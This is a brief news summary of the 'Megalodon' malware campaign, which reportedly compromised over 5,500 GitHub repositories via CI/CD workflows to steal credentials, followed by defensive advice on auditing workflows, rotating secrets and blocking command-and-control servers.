The "Megalodon" malware campaign has infected over 5,500 GitHub repositories within a six-hour timeframe, exploiting CI/CD workflows to steal sensitive credentials and developer secrets. Cybersecurity experts suspect the attackers utilized stolen credentials from previous breaches, and while similarities to the threat group TeamPCP exist, no direct links have been confirmed.
The Megalodon malware campaign highlights significant vulnerabilities in the software supply chain, particularly through GitHub repositories. As a cybersecurity professional, focus on auditing your GitHub repositories for malicious workflows and unauthorized changes, and ensure all credentials, SSH keys, and API keys are regularly rotated and revoked if suspicious activity is detected. Additionally, blocking connections to known command-and-control servers associated with Megalodon can mitigate further risks.